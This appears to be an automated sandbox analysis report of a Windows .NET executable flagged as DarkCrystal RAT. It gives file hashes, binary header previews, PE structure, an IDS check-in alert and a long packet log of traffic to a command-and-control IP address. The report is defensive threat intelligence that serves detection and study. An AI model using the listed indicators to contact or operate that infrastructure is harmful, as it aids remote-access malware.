                                                                                              Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):4608
                                                                                              Entropy (8bit):3.960657647523148
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:6XJbPtPaM7Jt8Bs3FJsdcV4MKe27jdFvqBH+OulajfqXSfbNtm:yPpHPc+Vx9MnvkYcjRzNt
                                                                                              MD5:87D4C15041E2AD3B86C8CFA6FAE46E3C
                                                                                              SHA1:3E52C4643B3116CEA5B95752BE4B4D91BDF28FA6
                                                                                              SHA-256:96E13A3E4F90AFBC8D869B388D50894D4693327DEA6219019A1C46745E826002
                                                                                              SHA-512:22E17E05B0BF7316AFE922AD1E8180B9A633CB8A6F1F203DF802EB6598E26BCFF2D7D1E51D4DA6B83FF810D1EA8B1BDB5FAB8B099850744C973E8EC7B8072CB7
                                                                                              Malicious:true
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... Wg.............................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..4.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                              Process:C:\Windows\System32\PING.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):502
                                                                                              Entropy (8bit):4.615650117503229
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:Ph5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:jdUOAokItULVDv
                                                                                              MD5:5FF667EE42675323399ED42D1D4E7D67
                                                                                              SHA1:D1270CCACF1852B1E94B65149EFB1C04EEBCE147
                                                                                              SHA-256:4FE52988323AFB1C290332B8EBED35A13166D46F80168D3C8F9F0E6A5874BECD
                                                                                              SHA-512:C8AFC2892F0D5B221437D0179FDF811E9459FD762E77CB2B72BA93B950113A8061889FA4C262F8A78487B8E58604BC64663DD78D4C82B862B82E446873A1B1C3
                                                                                              Malicious:false
                                                                                              Preview:..Pinging 932923 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              File name:4si9noTBNw.exe
                                                                                              File size:1'920'000 bytes
                                                                                              MD5:68ef473852d3aefd8e5e4f2e00b3dfaa
                                                                                              SHA1:3ba2594ec459d1c9152558ebdd9611427347a73e
                                                                                              SHA256:f28d2482802e94cd02376a7153b318ef4facc86cfc804ae117419c520520f8ec
                                                                                              SHA512:8602717380a4ad4ca7cbcdbb2373e63ff8578d58e6324d43530b134c6d7005469ff89c45bad773da978d4263a56c51efd331b09790f5708a563f26a513cad3ff
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              TLSH:2D959E06B6924E32C364573586AB513D4290C72A7A52FF1F391F21D2A91FBF18B721B3
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@................................
                                                                                              Icon Hash:90cececece8e8eb0
                                                                                              Entrypoint:0x5d631e
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x67395757 [Sun Nov 17 02:39:19 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1d62d0         0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1d8000         0x320         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1da000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x1d4324      0x1d4400  6750efa2fe1839c200a1361e393decdb  False     0.7786409670315003  data       7.53942476676294     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x1d8000         0x320         0x400     fefc90889af2a301686a704f2c7112cd  False     0.3525390625        data       2.651038093332615    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x1da000         0xc           0x200     e821884ebb4ee3ac1cb10f417b1d2d33  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name        RVA       Size   Type  Language  Country  ZLIB Complexity
RT_VERSION  0x1d8058  0x2c8  data                     0.46207865168539325

DLL          Import
mscoree.dll  _CorExeMain

Timestamp                        SID      Signature                                             Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2024-12-09T16:00:32.875792+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49736        37.44.238.250  80         TCP

Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 9, 2024 16:00:31.403799057 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:31.523168087 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:31.523241997 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:31.523606062 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:31.643734932 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:31.876008034 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:31.995610952 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:32.795283079 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:32.875606060 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:32.875722885 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:32.875792027 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:32.915924072 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.035296917 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:33.220446110 CET  49737        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.265873909 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.329189062 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:33.340545893 CET  80           49737      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:33.342761040 CET  49737        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.342895031 CET  49737        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.385328054 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:33.422000885 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.463747025 CET  80           49737      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:33.688447952 CET  49737        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.766499996 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:33.807980061 CET  80           49737      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:33.812653065 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.869049072 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:33.988394976 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:34.219031096 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:34.274930954 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:34.340173006 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:34.340327024 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:34.422012091 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:34.624191046 CET  80           49737      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:34.727336884 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:34.797005892 CET  49737        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:34.858685970 CET  80           49737      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:34.922055960 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:34.987003088 CET  49737        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.391999960 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.392899990 CET  49738        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.397429943 CET  49737        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.512329102 CET  80           49738      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:35.512408018 CET  49738        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.512550116 CET  80           49736      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:35.512603998 CET  49736        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.512751102 CET  49738        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.517429113 CET  80           49737      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:35.517494917 CET  49737        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.632100105 CET  80           49738      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:35.872297049 CET  49738        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:35.992079973 CET  80           49738      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.379184008 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.390875101 CET  49738        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.498611927 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.498709917 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.498913050 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.510740995 CET  80           49738      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.510792017 CET  49738        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.544984102 CET  49742        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.618165016 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.664398909 CET  80           49742      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.664484024 CET  49742        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.664628029 CET  49742        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.783871889 CET  80           49742      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.844135046 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.963665009 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963680029 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963699102 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963706970 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963741064 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.963754892 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963764906 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963797092 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963803053 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.963859081 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963867903 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.963917971 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:36.963958025 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:36.966630936 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.015894890 CET  49742        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.083753109 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.083782911 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.083791971 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.083800077 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.083858967 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.083873034 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.083904982 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.083914042 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.127130985 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.128724098 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.135272026 CET  80           49742      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.247376919 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.251404047 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.291253090 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.294848919 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.414351940 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.455351114 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.455413103 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.483129978 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.483306885 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.483400106 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.575740099 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.575820923 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.603751898 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.603766918 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.603807926 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.603817940 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.603813887 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.603840113 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.603858948 CET  49741        80         192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:37.604218960 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604228973 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604239941 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604326010 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604336023 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604346991 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604356050 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604366064 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604374886 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604470015 CET  80           49741      37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:37.604628086 CET  80           49741      37.44.238.250  192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604636908 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604789019 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604799032 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604958057 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604968071 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605082035 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605091095 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605273008 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605283022 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605417013 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605437994 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605448008 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605575085 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605593920 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605726004 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605902910 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.696629047 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.724154949 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.724473953 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.724647045 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.770098925 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.922023058 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.934995890 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.026982069 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.174645901 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.218894958 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.312227011 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.314802885 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.431916952 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.432020903 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.434107065 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.434200048 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.434356928 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.553787947 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.781555891 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.803881884 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.900974989 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.909017086 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.738765955 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:39.782144070 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.782932997 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.797019005 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.902355909 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:39.902678967 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.903280020 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:39.906775951 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.906934023 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.970696926 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.026926041 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.093905926 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.100490093 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.101242065 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.220953941 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.221019983 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.221182108 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.221226931 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.221318960 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.266098022 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.340641975 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.387561083 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.387573957 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.579246044 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.698916912 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.185609102 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.418291092 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.418359041 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.492619991 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.534048080 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.726821899 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.875247955 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.875747919 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.876533985 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.996360064 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.996417046 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.997479916 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.997494936 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.997553110 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.997585058 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.997818947 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:42.117242098 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:42.344016075 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:42.464006901 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.293565035 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.422032118 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.526642084 CET804974837.44.238.250192.168.2.4
